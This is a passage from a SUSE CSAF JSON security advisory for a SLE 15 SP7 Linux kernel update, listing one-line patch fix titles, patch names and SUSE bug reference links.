Fix cond_exec handling in amdgpu_ib_schedule() (git-fixes).\n- drm/amdgpu: fix NULL pointer dereference in amdgpu_gmc_filter_faults_remove (git-fixes).\n- drm/amdgpu: Fix query for VPE block_type and ip_count (stable-fixes).\n- drm/amdgpu: remove frame cntl for gfx v12 (stable-fixes).\n- drm/amdkfd: fix a memory leak in device_queue_manager_init() (git-fixes).\n- drm/amdkfd: Fix improper NULL termination of queue restore SMI event string (stable-fixes).\n- drm/imagination: Wait for FW trace update command completion (git-fixes).\n- drm/imx/tve: fix probe device leak (git-fixes).\n- drm/msm/a6xx: fix bogus hwcg register updates (git-fixes).\n- drm/nouveau: add missing DCB connector types (git-fixes).\n- drm/nouveau: implement missing DCB connector types; gracefully handle unknown connectors (git-fixes).\n- drm/nouveau/disp: Set drm_mode_config_funcs.atomic_(check|commit) (stable-fixes).\n- drm/nouveau/disp/nv50-: Set lock_core in curs507a_prepare (git-fixes).\n- drm/panel-simple: fix connector type for DataImage SCF0700C48GGU18 panel (git-fixes).\n- drm/radeon: Remove __counted_by from ClockInfoArray.clockInfo[] (stable-fixes).\n- drm/vmwgfx: Fix an error return check in vmw_compat_shader_add() (git-fixes).\n- drm/vmwgfx: Merge vmw_bo_release and vmw_bo_free functions (git-fixes).\n- exfat: check return value of sb_min_blocksize in exfat_read_boot_sector (git-fixes).\n- exfat: fix remount failure in different process environments (git-fixes).\n- gpio: omap: do not register driver in probe() (git-fixes).\n- gpio: pca953x: Add support for level-triggered interrupts (stable-fixes).\n- gpio: pca953x: fix wrong error probe return value (git-fixes).\n- gpio: pca953x: handle short interrupt pulses on PCAL devices (git-fixes).\n- gpio: pca953x: Utilise dev_err_probe() where it makes sense (stable-fixes).\n- gpio: pca953x: Utilise temporary variable for struct device (stable-fixes).\n- gpio: rockchip: Stop calling pinctrl for set_direction (git-fixes).\n- HID: usbhid: paper over wrong bNumDescriptor field (stable-fixes).\n- ice: use netif_get_num_default_rss_queues() (bsc#1247712).\n- iio: accel: iis328dq: fix gain values (git-fixes).\n- iio: adc: ad7280a: handle spi_setup() errors in probe() (git-fixes).\n- iio: adc: ad9467: fix ad9434 vref mask (git-fixes).\n- iio: adc: at91-sama5d2_adc: Fix potential use-after-free in sama5d2_adc driver (git-fixes).\n- iio: dac: ad5686: add AD5695R to ad5686_chip_info_tbl (git-fixes).\n- iio: imu: st_lsm6dsx: fix iio_chan_spec for sensors without event detection (git-fixes).\n- Input: i8042 - add quirk for ASUS Zenbook UX425QA_UM425QA (stable-fixes).\n- Input: i8042 - add quirks for MECHREVO Wujie 15X Pro (stable-fixes).\n- intel_th: fix device leak on output open() (git-fixes).\n- leds: led-class: Only Add LED to leds_list when it is fully ready (git-fixes).\n- lib/crypto: aes: Fix missing MMU protection for AES S-box (git-fixes).\n- mei: me: add nova lake point S DID (stable-fixes).\n- mei: me: add wildcat lake P DID (stable-fixes).\n- mISDN: annotate data-race around dev-\u003ework (git-fixes).\n- mm, page_alloc, thp: prevent reclaim for __GFP_THISNODE THP allocations (bsc#1253087).\n- mmc: rtsx_pci_sdmmc: implement sdmmc_card_busy function (git-fixes).\n- mmc: sdhci-of-dwcmshc: Prevent illegal clock reduction in HS200/HS400 mode (git-fixes).\n- net: can: j1939: j1939_xtp_rx_rts_session_active(): deactivate session upon receiving the second rts (git-fixes).\n- net: hv_netvsc: reject RSS hash key programming without RX indirection table (bsc#1257473).\n- net: mana: Add metadata support for xdp mode (git-fixes).\n- net: mana: Add standard counter rx_missed_errors (git-fixes).\n- net: mana: Add support for auxiliary device servicing events (git-fixes).\n- net: mana: Change the function signature of mana_get_primary_netdev_rcu (bsc#1256690).\n- net: mana: Drop TX skb on post_work_request failure and unmap resources (git-fixes).\n- net: mana: fix spelling for mana_gd_deregiser_irq() (git-fixes).\n- net: mana: Fix use-after-free in reset service rescan path (git-fixes).\n- net: mana: Fix warnings for missing export.h header inclusion (git-fixes).\n- net: mana: Handle hardware recovery events when probing the device (git-fixes).\n- net: mana: Handle Reset Request from MANA NIC (git-fixes).\n- net: mana: Handle SKB if TX SGEs exceed hardware limit (git-fixes).\n- net: mana: Handle unsupported HWC commands (git-fixes).\n- net: mana: Move hardware counter stats from per-port to per-VF context (git-fixes).\n- net: mana: Probe rdma device in mana driver (git-fixes).\n- net: mana: Reduce waiting time if HWC not responding (git-fixes).\n- net: tcp: allow zero-window ACK update the window (bsc#1254767).\n- net: usb: dm9601: remove broken SR9700 support (git-fixes).\n- net: wwan: t7xx: fix potential skb-\u003efrags overflow in RX path (git-fixes).\n- nfc: llcp: Fix memleak in nfc_llcp_send_ui_frame() (git-fixes).\n- nfc: nci: Fix race between rfkill and nci_unregister_device() (git-fixes).\n- NFS: Fix up the automount fs_context to use the correct cred (git-fixes).\n- nfsd: Drop the client reference in client_states_open() (git-fixes).\n- NFSD: Fix permission check for read access to executable-only files (git-fixes).\n- NFSD: use correct reservation type in nfsd4_scsi_fence_client (git-fixes).\n- NFSD/blocklayout: Fix minlength check in proc_layoutget (git-fixes).\n- NFSv4: ensure the open stateid seqid doesn\u0027t go backwards (git-fixes).\n- nvme: nvme-fc: move tagset removal to nvme_fc_delete_ctrl() (git-fixes).\n- nvmet-auth: update sc_c in host response (git-fixes).\n- nvmet-auth: update sc_c in target host hash calculation (git-fixes).\n- of: fix reference count leak in of_alias_scan() (git-fixes).\n- of: platform: Use default match table for /firmware (git-fixes).\n- phy: freescale: imx8m-pcie: assert phy reset during power on (stable-fixes).\n- phy: rockchip: inno-usb2: fix communication disruption in gadget mode (git-fixes).\n- phy: rockchip: inno-usb2: fix disconnection in gadget mode (git-fixes).\n- phy: stm32-usphyc: Fix off by one in probe() (git-fixes).\n- phy: tegra: xusb: Explicitly configure HS_DISCON_LEVEL to 0x7 (git-fixes).\n- platform/x86: hp-bioscfg: Fix automatic module loading (git-fixes).\n- platform/x86: hp-bioscfg: Fix kernel panic in GET_INSTANCE_ID macro (git-fixes).\n- platform/x86: hp-bioscfg: Fix kobject warnings for empty attribute names (git-fixes).\n- platform/x86/amd: Fix memory leak in wbrf_record() (git-fixes).\n- pnfs/flexfiles: Fix memory leak in nfs4_ff_alloc_deviceid_node() (git-fixes).\n- powercap: fix race condition in register_control_type() (stable-fixes).\n- powercap: fix sscanf() error return value handling (stable-fixes).\n- powerpc/addnote: Fix overflow on 32-bit builds (bsc#1215199).\n- RDMA/mana_ib: Access remote atomic for MRs (git-fixes).\n- RDMA/mana_ib: add additional port counters (git-fixes).\n- RDMA/mana_ib: Add device statistics support (git-fixes).\n- RDMA/mana_ib: Add port statistics support (git-fixes).\n- RDMA/mana_ib: Add support of 4M, 1G, and 2G pages (git-fixes).\n- RDMA/mana_ib: Add support of mana_ib for RNIC and ETH nic (git-fixes).\n- RDMA/mana_ib: add support of multiple ports (git-fixes).\n- RDMA/mana_ib: Allow registration of DMA-mapped memory in PDs (git-fixes).\n- RDMA/mana_ib: check cqe length for kernel CQs (git-fixes).\n- RDMA/mana_ib: Create and destroy UD/GSI QP (git-fixes).\n- RDMA/mana_ib: create kernel-level CQs (git-fixes).\n- RDMA/mana_ib: create/destroy AH (git-fixes).\n- RDMA/mana_ib: Drain send wrs of GSI QP (git-fixes).\n- RDMA/mana_ib: extend mana QP table (git-fixes).\n- RDMA/mana_ib: Extend modify QP (git-fixes).\n- RDMA/mana_ib: Fix error code in probe() (git-fixes).\n- RDMA/mana_ib: Fix integer overflow during queue creation (git-fixes).\n- RDMA/mana_ib: Handle net event for pointing to the current netdev (bsc#1256690).\n- RDMA/mana_ib: helpers to allocate kernel queues (git-fixes).\n- RDMA/mana_ib: Implement DMABUF MR support (git-fixes).\n- RDMA/mana_ib: implement get_dma_mr (git-fixes).\n- RDMA/mana_ib: implement req_notify_cq (git-fixes).\n- RDMA/mana_ib: indicate CM support (git-fixes).\n- RDMA/mana_ib: polling of CQs for GSI/UD (git-fixes).\n- RDMA/mana_ib: Query feature_flags bitmask from FW (git-fixes).\n- RDMA/mana_ib: request error CQEs when supported (git-fixes).\n- RDMA/mana_ib: support of the zero based MRs (git-fixes).\n- RDMA/mana_ib: UD/GSI QP creation for kernel (git-fixes).\n- RDMA/mana_ib: UD/GSI work requests (git-fixes).\n- RDMA/mana_ib: unify mana_ib functions to support any gdma device (git-fixes).\n- RDMA/mana_ib: Use safer allocation function() (git-fixes).\n- regmap: Fix race condition in hwspinlock irqsave routine (git-fixes).\n- sched: Increase sched_tick_remote timeout (bsc#1254510).\n- sched/rt: Skip group schedulable check with rt_group_sched=0 (bsc#1256568).\n- scripts: obsapi: Support URL trailing / in oscrc.\n- scripts: teaapi: Add paging.\n- scripts: uploader: Fix no change condition for _maintainership.json.\n- scripts: uploader: Handle missing upstream in is_pr_open.\n- scripts/python/git_sort/git_sort.yaml: add cifs for-next repository.\n- scrits: teaapi: Add list_repos.\n- scsi: lpfc: Rework lpfc_sli4_fcf_rr_next_index_get() (bsc#1256861).\n- scsi: lpfc: Update lpfc version to 14.4.0.13 (bsc#1256861).\n- scsi: qla2xxx: Add bsg interface to support firmware img validation (bsc#1256863).\n- scsi: qla2xxx: Add load flash firmware mailbox support for 28xxx (bsc#1256863).\n- scsi: qla2xxx: Add Speed in SFP print information (bsc#1256863).\n- scsi: qla2xxx: Add support for 64G SFP speed (bsc#1256863).\n- scsi: qla2xxx: Allow recovery for tape devices (bsc#1256863).\n- scsi: qla2xxx: Delay module unload while fabric scan in progress (bsc#1256863).\n- scsi: qla2xxx: Fix bsg_done() causing double free (bsc#1256863).\n- scsi: qla2xxx: Free sp in error path to fix system crash (bsc#1256863).\n- scsi: qla2xxx: Query FW again before proceeding with login (bsc#1256863).\n- scsi: qla2xxx: Update version to 10.02.10.100-k (bsc#1256863).\n- scsi: qla2xxx: Validate MCU signature before executing MBC 03h (bsc#1256863).\n- scsi: qla2xxx: Validate sp before freeing associated memory (bsc#1256863).\n- scsi: storvsc: Process unsupported MODE_SENSE_10 (bsc#1257296).\n- selftests: net: fib-onlink-tests: Convert to use namespaces by default (bsc#1255346).\n- selftests/bpf: Fix flaky bpf_cookie selftest (git-fixes).\n- serial: 8250_pci: Fix broken RS485 for F81504/508/512 (git-fixes).\n- slimbus: core: fix device reference leak on report present (git-fixes).\n- slimbus: core: fix OF node leak on registration failure (git-fixes).\n- slimbus: core: fix of_slim_get_device() kernel doc (git-fixes).\n- slimbus: core: fix runtime PM imbalance on report present (git-fixes).\n- smb: change return type of cached_dir_lease_break() to bool (git-fixes).\n- smb: client: ensure open_cached_dir_by_dentry() only returns valid cfid (git-fixes).\n- smb: client: fix cifs_pick_channel when channel needs reconnect (git-fixes).\n- smb: client: fix warning when reconnecting channel (git-fixes).\n- smb: client: introduce close_cached_dir_locked() (git-fixes).\n- smb: client: remove unused fid_lock (git-fixes).\n- smb: client: short-circuit in open_cached_dir_by_dentry() if !dentry (git-fixes).\n- smb: client: split cached_fid bitfields to avoid shared-byte RMW races (bsc#1250748).\n- smb: client: update cfid-\u003elast_access_time in open_cached_dir_by_dentry() (git-fixes).\n- smb: improve directory cache reuse for readdir operations (bsc#1252712).\n- smb3: add missing null server pointer check (git-fixes).\n- spi: spi-sprd-adi: Fix double free in probe error path (git-fixes).\n- spi: sprd-adi: switch to use spi_alloc_host() (stable-fixes).\n- spi: sprd: adi: Use devm_register_restart_handler() (stable-fixes).\n- svcrdma: return 0 on success from svc_rdma_copy_inline_range (git-fixes).\n- uacce: ensure safe queue release with state management (git-fixes).\n- uacce: fix cdev handling in the cleanup path (git-fixes).\n- uacce: fix isolate sysfs check condition (git-fixes).\n- uacce: implement mremap in uacce_vm_ops to return -EPERM (git-fixes).\n- usb: core: add USB_QUIRK_NO_BOS for devices that hang on BOS descriptor (stable-fixes).\n- usb: dwc3: Check for USB4 IP_NAME (stable-fixes).\n- USB: OHCI/UHCI: Add soft dependencies on ehci_platform (stable-fixes).\n- USB: serial: ftdi_sio: add support for PICAXE AXE027 cable (stable-fixes).\n- USB: serial: option: add Telit LE910 MBIM composition (stable-fixes).\n- usbnet: limit max_mtu based on device\u0027s hard_mtu (git-fixes).\n- w1: fix redundant counter decrement in w1_attach_slave_device() (git-fixes).\n- w1: therm: Fix off-by-one buffer overflow in alarms_store (git-fixes).\n- wifi: ath10k: fix dma_free_coherent() pointer (git-fixes).\n- wifi: ath12k: fix dma_free_coherent() pointer (git-fixes).\n- wifi: mac80211: correctly decode TTLM with default link map (git-fixes).\n- wifi: mac80211: don\u0027t perform DA check on S1G beacon (git-fixes).\n- wifi: mwifiex: Fix a loop in mwifiex_update_ampdu_rxwinsize() (git-fixes).\n- wifi: rsi: Fix memory corruption due to not set vif driver data size (git-fixes).\n- x86: make page fault handling disable interrupts properly (git-fixes).\n- x86/microcode: Fix Entrysign revision check for Zen1/Naples (bsc#1256528).\n- x86/microcode/AMD: Add more known models to entry sign checking (bsc#1256528).\n- x86/microcode/AMD: Add some forgotten models to the SHA check (bsc#1256528).\n- x86/microcode/AMD: Add TSA microcode SHAs (bsc#1256528).\n- x86/microcode/AMD: Add Zen5 model 0x44, stepping 0x1 minrev (bsc#1256528).\n- x86/microcode/AMD: Clean the cache if update did not load microcode (bsc#1256528).\n- x86/microcode/AMD: Extend the SHA check to Zen5, block loading of any unreleased standalone Zen5 microcode patches (bsc#1256528).\n- x86/microcode/AMD: Fix __apply_microcode_amd()\u0027s return value (bsc#1256528).\n- x86/microcode/AMD: Fix Entrysign revision check for Zen5/Strix Halo (bsc#1256528).\n- x86/microcode/AMD: Limit Entrysign signature checking to known generations (bsc#1256528).\n- x86/microcode/AMD: Load only SHA256-checksummed patches (bsc#1256528).\n- x86/microcode/AMD: Use sha256() instead of init/update/final (bsc#1256528).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2026-447,SUSE-SLE-Module-Basesystem-15-SP7-2026-447,SUSE-SLE-Module-Development-Tools-15-SP7-2026-447,SUSE-SLE-Module-Legacy-15-SP7-2026-447,SUSE-SLE-Module-Live-Patching-15-SP7-2026-447,SUSE-SLE-Product-HA-15-SP7-2026-447,SUSE-SLE-Product-WE-15-SP7-2026-447",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_0447-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:0447-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260447-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:0447-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-February/024124.html"
},
{
"category": "self",
"summary": "SUSE Bug 1205462",
"url": "https://bugzilla.suse.com/1205462"
},
{
"category": "self",
"summary": "SUSE Bug 1214285",
"url": "https://bugzilla.suse.com/1214285"
},
{
"category": "self",
"summary": "SUSE Bug 1215199",
"url": "https://bugzilla.suse.com/1215199"
},
{
"category": "self",
"summary": "SUSE Bug 1223800",
"url": "https://bugzilla.suse.com/1223800"
},
{
"category": "self",
"summary": "SUSE Bug 1228490",
"url": "https://bugzilla.suse.com/1228490"
},
{
"category": "self",
"summary": "SUSE Bug 1233563",
"url": "https://bugzilla.suse.com/1233563"
},
{
"category": "self",
"summary": "SUSE Bug 1234842",
"url": "https://bugzilla.suse.com/1234842"
},
{
"category": "self",
"summary": "SUSE Bug 1235566",
"url": "https://bugzilla.suse.com/1235566"
},
{
"category": "self",
"summary": "SUSE Bug 1241437",
"url": "https://bugzilla.suse.com/1241437"
},
{
"category": "self",
"summary": "SUSE Bug 1242505",
"url": "https://bugzilla.suse.com/1242505"
},
{
"category": "self",
"summary": "SUSE Bug 1242909",
"url": "https://bugzilla.suse.com/1242909"
},
{
"category": "self",
"summary": "SUSE Bug 1243662",
"url": "https://bugzilla.suse.com/1243662"
},
{
"category": "self",
"summary": "SUSE Bug 1243677",
"url": "https://bugzilla.suse.com/1243677"
},
{
"category": "self",
"summary": "SUSE Bug 1243678",
"url": "https://bugzilla.suse.com/1243678"
},
{
"category": "self",
"summary": "SUSE Bug 1245538",
"url": "https://bugzilla.suse.com/1245538"
},
{
"category": "self",
"summary": "SUSE Bug 1246022",
"url": "https://bugzilla.suse.com/1246022"
},
{
"category": "self",
"summary": "SUSE Bug 1246184",
"url": "https://bugzilla.suse.com/1246184"
},
{
"category": "self",
"summary": "SUSE Bug 1246447",
"url": "https://bugzilla.suse.com/1246447"
},
{
"category": "self",
"summary": "SUSE Bug 1247030",
"url": "https://bugzilla.suse.com/1247030"
},
{
"category": "self",
"summary": "SUSE Bug 1247712",
"url": "https://bugzilla.suse.com/1247712"
},
{
"category": "self",
"summary": "SUSE Bug 1248211",
"url": "https://bugzilla.suse.com/1248211"
},
{
"category": "self",
"summary": "SUSE Bug 1249307",
"url": "https://bugzilla.suse.com/1249307"
},
{
"category": "self",
"summary": "SUSE Bug 1249904",
"url": "https://bugzilla.suse.com/1249904"
},
{
"category": "self",
"summary": "SUSE Bug 1250032",
"url": "https://bugzilla.suse.com/1250032"
},
{
"category": "self",
"summary": "SUSE Bug 1250082",
"url": "https://bugzilla.suse.com/1250082"
},
{
"category": "self",
"summary": "SUSE Bug 1250388",
"url": "https://bugzilla.suse.com/1250388"
},
{
"category": "self",
"summary": "SUSE Bug 1250705",
"url": "https://bugzilla.suse.com/1250705"
},
{
"category": "self",
"summary": "SUSE Bug 1250748",
"url": "https://bugzilla.suse.com/1250748"
},
{
"category": "self",
"summary": "SUSE Bug 1252511",
"url": "https://bugzilla.suse.com/1252511"
},
{
"category": "self",
"summary": "SUSE Bug 1252712",
"url": "https://bugzilla.suse.com/1252712"
},
{
"category": "self",
"summary": "SUSE Bug 1252891",
"url": "https://bugzilla.suse.com/1252891"
},
{
"category": "self",
"summary": "SUSE Bug 1252900",
"url": "https://bugzilla.suse.com/1252900"
},
{
"category": "self",
"summary": "SUSE Bug 1253087",
"url": "https://bugzilla.suse.com/1253087"
},
{
"category": "self",
"summary": "SUSE Bug 1253330",
"url": "https://bugzilla.suse.com/1253330"
},
{
"category": "self",
"summary": "SUSE Bug 1253340",
"url": "https://bugzilla.suse.com/1253340"
},
{
"category": "self",
"summary": "SUSE Bug 1253348",
"url": "https://bugzilla.suse.com/1253348"
},
{
"category": "self",
"summary": "SUSE Bug 1253433",
"url": "https://bugzilla.suse.com/1253433"
},
{
"category": "self",
"summary": "SUSE Bug 1253443",
"url": "https://bugzilla.suse.com/1253443"
},
{
"category": "self",
"summary": "SUSE Bug 1253451",
"url": "https://bugzilla.suse.com/1253451"
},
{
"category": "self",
"summary": "SUSE Bug 1253471",
"url": "https://bugzilla.suse.com/1253471"
},
{
"category": "self",
"summary": "SUSE Bug 1253739",
"url": "https://bugzilla.suse.com/1253739"
},
{
"category": "self",
"summary": "SUSE Bug 1254244",
"url": "https://bugzilla.suse.com/1254244"
},
{
"category": "self",
"summary": "SUSE Bug 1254447",
"url": "https://bugzilla.suse.com/1254447"
},
{
"category": "self",
"summary": "SUSE Bug 1254465",
"url": "https://bugzilla.suse.com/1254465"
},
{
"category": "self",
"summary": "SUSE Bug 1254510",
"url": "https://bugzilla.suse.com/1254510"
},
{
"category": "self",
"summary": "SUSE Bug 1254624",
"url": "https://bugzilla.suse.com/1254624"
},
{
"category": "self",
"summary": "SUSE Bug 1254767",
"url": "https://bugzilla.suse.com/1254767"
},
{
"category": "self",
"summary": "SUSE Bug 1254835",
"url": "https://bugzilla.suse.com/1254835"
},
{
"category": "self",
"summary": "SUSE Bug 1254839",
"url": "https://bugzilla.suse.com/1254839"
},
{
"category": "self",
"summary": "SUSE Bug 1254842",
"url": "https://bugzilla.suse.com/1254842"
},
{
"category": "self",
"summary": "SUSE Bug 1254845",
"url": "https://bugzilla.suse.com/1254845"
},
{
"category": "self",
"summary": "SUSE Bug 1254852",
"url": "https://bugzilla.suse.com/1254852"
},
{
"category": "self",
"summary": "SUSE Bug 1254871",
"url": "https://bugzilla.suse.com/1254871"
},
{
"category": "self",
"summary": "SUSE Bug 1255102",
"url": "https://bugzilla.suse.com/1255102"
},
{
"category": "self",
"summary": "SUSE Bug 1255120",
"url": "https://bugzilla.suse.com/1255120"
},
{
"category": "self",
"summary": "SUSE Bug 1255128",
"url": "https://bugzilla.suse.com/1255128"
},
{
"category": "self",
"summary": "SUSE Bug 1255138",
"url": "https://bugzilla.suse.com/1255138"
},
{
"category": "self",
"summary": "SUSE Bug 1255140",
"url": "https://bugzilla.suse.com/1255140"
},
{
"category": "self",
"summary": "SUSE Bug 1255157",
"url": "https://bugzilla.suse.com/1255157"
},
{
"category": "self",
"summary": "SUSE Bug 1255164",
"url": "https://bugzilla.suse.com/1255164"
},
{
"category": "self",
"summary": "SUSE Bug 1255172",
"url": "https://bugzilla.suse.com/1255172"
},
{
"category": "self",
"summary": "SUSE Bug 1255216",
"url": "https://bugzilla.suse.com/1255216"
},
{
"category": "self",
"summary": "SUSE Bug 1255226",
"url": "https://bugzilla.suse.com/1255226"
},
{
"category": "self",
"summary": "SUSE Bug 1255241",
"url": "https://bugzilla.suse.com/1255241"
},
{
"category": "self",
"summary": "SUSE Bug 1255255",
"url": "https://bugzilla.suse.com/1255255"
},
{
"category": "self",
"summary": "SUSE Bug 1255260",
"url": "https://bugzilla.suse.com/1255260"
},
{
"category": "self",
"summary": "SUSE Bug 1255261",
"url": "https://bugzilla.suse.com/1255261"
},
{
"category": "self",
"summary": "SUSE Bug 1255266",
"url": "https://bugzilla.suse.com/1255266"
},
{
"category": "self",
"summary": "SUSE Bug 1255268",
"url": "https://bugzilla.suse.com/1255268"
},
{
"category": "self",
"summary": "SUSE Bug 1255269",
"url": "https://bugzilla.suse.com/1255269"
},
{
"category": "self",
"summary": "SUSE Bug 1255327",
"url": "https://bugzilla.suse.com/1255327"
},
{
"category": "self",
"summary": "SUSE Bug 1255346",
"url": "https://bugzilla.suse.com/1255346"
},
{
"category": "self",
"summary": "SUSE Bug 1255377",
"url": "https://bugzilla.suse.com/1255377"
},
{
"category": "self",
"summary": "SUSE Bug 1255401",
"url": "https://bugzilla.suse.com/1255401"
},
{
"category": "self",
"summary": "SUSE Bug 1255403",
"url": "https://bugzilla.suse.com/1255403"
},
{
"category": "self",
"summary": "SUSE Bug 1255417",
"url": "https://bugzilla.suse.com/1255417"
},
{
"category": "self",
"summary": "SUSE Bug 1255482",
"url": "https://bugzilla.suse.com/1255482"
},
{
"category": "self",
"summary": "SUSE Bug 1255488",
"url": "https://bugzilla.suse.com/1255488"
},
{
"category": "self",
"summary": "SUSE Bug 1255537",
"url": "https://bugzilla.suse.com/1255537"
},
{
"category": "self",
"summary": "SUSE Bug 1255539",
"url": "https://bugzilla.suse.com/1255539"
},
{
"category": "self",
"summary": "SUSE Bug 1255544",
"url": "https://bugzilla.suse.com/1255544"
},
{
"category": "self",
"summary": "SUSE Bug 1255547",
"url": "https://bugzilla.suse.com/1255547"
},
{
"category": "self",
"summary": "SUSE Bug 1255548",
"url": "https://bugzilla.suse.com/1255548"
},
{
"category": "self",
"summary": "SUSE Bug 1255552",
"url": "https://bugzilla.suse.com/1255552"
},
{
"category": "self",
"summary": "SUSE Bug 1255568",
"url": "https://bugzilla.suse.com/1255568"
},
{
"category": "self",
"summary": "SUSE Bug 1255569",
"url": "https://bugzilla.suse.com/1255569"
},
{
"category": "self",
"summary": "SUSE Bug 1255615",
"url": "https://bugzilla.suse.com/1255615"
},
{
"category": "self",
"summary": "SUSE Bug 1255622",
"url": "https://bugzilla.suse.com/1255622"
},
{
"category": "self",
"summary": "SUSE Bug 1255695",
"url": "https://bugzilla.suse.com/1255695"
},
{
"category": "self",
"summary": "SUSE Bug 1255930",
"url": "https://bugzilla.suse.com/1255930"
},
{
"category": "self",
"summary": "SUSE Bug 1256280",
"url": "https://bugzilla.suse.com/1256280"
},
{
"category": "self",
"summary": "SUSE Bug 1256528",
"url": "https://bugzilla.suse.com/1256528"
},
{
"category": "self",
"summary": "SUSE Bug 1256568",
"url": "https://bugzilla.suse.com/1256568"
},
{
"category": "self",
"summary": "SUSE Bug 1256579",
"url": "https://bugzilla.suse.com/1256579"
},
{
"category": "self",
"summary": "SUSE Bug 1256582",
"url": "https://bugzilla.suse.com/1256582"
},
{
"category": "self",
"summary": "SUSE Bug 1256584",
"url": "https://bugzilla.suse.com/1256584"
},
{
"category": "self",
"summary": "SUSE Bug 1256586",
"url": "https://bugzilla.suse.com/1256586"
},
{
"category": "self",
"summary": "SUSE Bug 1256591",
"url": "https://bugzilla.suse.com/1256591"
},
{
"category": "self",
"summary": "SUSE Bug 1256592",
"url": "https://bugzilla.suse.com/1256592"
},
{
"category": "self",
"summary": "SUSE Bug 1256593",
"url": "https://bugzilla.suse.com/1256593"
},
{
"category": "self",
"summary": "SUSE Bug 1256594",
"url": "https://bugzilla.suse.com/1256594"
},
{
"category": "self",
"summary": "SUSE Bug 1256597",
"url": "https://bugzilla.suse.com/1256597"
},
{
"category": "self",
"summary": "SUSE Bug 1256605",
"url": "https://bugzilla.suse.com/1256605"
},
{
"category": "self",
"summary": "SUSE Bug 1256606",
"url": "https://bugzilla.suse.com/1256606"
},
{
"category": "self",
"summary": "SUSE Bug 1256607",
"url": "https://bugzilla.suse.com/1256607"
},
{
"category": "self",
"summary": "SUSE Bug 1256608",
"url": "https://bugzilla.suse.com/1256608"
},
{
"category": "self",
"summary": "SUSE Bug 1256609",
"url": "https://bugzilla.suse.com/1256609"
},
{
"category": "self",
"summary": "SUSE Bug 1256610",
"url": "https://bugzilla.suse.com/1256610"
},
{
"category": "self",
"summary": "SUSE Bug 1256611",
"url": "https://bugzilla.suse.com/1256611"
},
{
"category": "self",
"summary": "SUSE Bug 1256612",
"url": "https://bugzilla.suse.com/1256612"
},
{
"category": "self",
"summary": "SUSE Bug 1256613",
"url": "https://bugzilla.suse.com/1256613"
},
{
"category": "self",
"summary": "SUSE Bug 1256616",
"url": "https://bugzilla.suse.com/1256616"
},
{
"category": "self",
"summary": "SUSE Bug 1256617",
"url": "https://bugzilla.suse.com/1256617"
},
{
"category": "self",
"summary": "SUSE Bug 1256619",
"url": "https://bugzilla.suse.com/1256619"
},
{
"category": "self",
"summary": "SUSE Bug 1256622",
"url": "https://bugzilla.suse.com/1256622"
},
{
"category": "self",
"summary": "SUSE Bug 1256623",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "self",
"summary": "SUSE Bug 1256625",
"url": "https://bugzilla.suse.com/1256625"
},
{
"category": "self",
"summary": "SUSE Bug 1256627",
"url": "https://bugzilla.suse.com/1256627"
},
{
"category": "self",
"summary": "SUSE Bug 1256628",
"url": "https://bugzilla.suse.com/1256628"
},
{
"category": "self",
"summary": "SUSE Bug 1256630",
"url": "https://bugzilla.suse.com/1256630"
},
{
"category": "self",
"summary": "SUSE Bug 1256638",
"url": "https://bugzilla.suse.com/1256638"
},
{
"category": "self",
"summary": "SUSE Bug 1256641",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "self",
"summary": "SUSE Bug 1256645",
"url": "https://bugzilla.suse.com/1256645"
},
{
"category": "self",
"summary": "SUSE Bug 1256646",
"url": "https://bugzilla.suse.com/1256646"
},
{
"category": "self",
"summary": "SUSE Bug 1256650",
"url": "https://bugzilla.suse.com/1256650"
},
{
"category": "self",
"summary": "SUSE Bug 1256651",
"url": "https://bugzilla.suse.com/1256651"
},
{
"category": "self",
"summary": "SUSE Bug 1256653",
"url": "https://bugzilla.suse.com/1256653"
},
{
"category": "self",
"summary": "SUSE Bug 1256654",
"url": "https://bugzilla.suse.com/1256654"
},
{
"category": "self",
"summary": "SUSE Bug 1256655",
"url": "https://bugzilla.suse.com/1256655"
},
{
"category": "self",
"summary": "SUSE Bug 1256659",
"url": "https://bugzilla.suse.com/1256659"
},
{
"category": "self",
"summary": "SUSE Bug 1256660",
"url": "https://bugzilla.suse.com/1256660"
},
{
"category": "self",
"summary": "SUSE Bug 1256661",
"url": "https://bugzilla.suse.com/1256661"
},
{
"category": "self",
"summary": "SUSE Bug 1256664",
"url": "https://bugzilla.suse.com/1256664"
},
{
"category": "self",
"summary": "SUSE Bug 1256665",
"url": "https://bugzilla.suse.com/1256665"
},
{
"category": "self",
"summary": "SUSE Bug 1256674",
"url": "https://bugzilla.suse.com/1256674"
},
{
"category": "self",
"summary": "SUSE Bug 1256680",
"url": "https://bugzilla.suse.com/1256680"
},
{
"category": "self",
"summary": "SUSE Bug 1256682",
"url": "https://bugzilla.suse.com/1256682"
},
{
"category": "self",
"summary": "SUSE Bug 1256688",
"url": "https://bugzilla.suse.com/1256688"
},
{
"category": "self",
"summary": "SUSE Bug 1256689",
"url": "https://bugzilla.suse.com/1256689"
},
{
"category": "self",
"summary": "SUSE Bug 1256690",
"url": "https://bugzilla.suse.com/1256690"
},
{
"category": "self",
"summary": "SUSE Bug 1256726",
"url": "https://bugzilla.suse.com/1256726"
},
{
"category": "self",
"summary": "SUSE Bug 1256728",
"url": "https://bugzilla.suse.com/1256728"
},
{
"category": "self",
"summary": "SUSE Bug 1256730",
"url": "https://bugzilla.suse.com/1256730"
},
{
"category": "self",
"summary": "SUSE Bug 1256733",
"url": "https://bugzilla.suse.com/1256733"
},
{
"category": "self",
"summary": "SUSE Bug 1256737",
"url": "https://bugzilla.suse.com/1256737"
},
{
"category": "self",
"summary": "SUSE Bug 1256741",
"url": "https://bugzilla.suse.com/1256741"
},
{
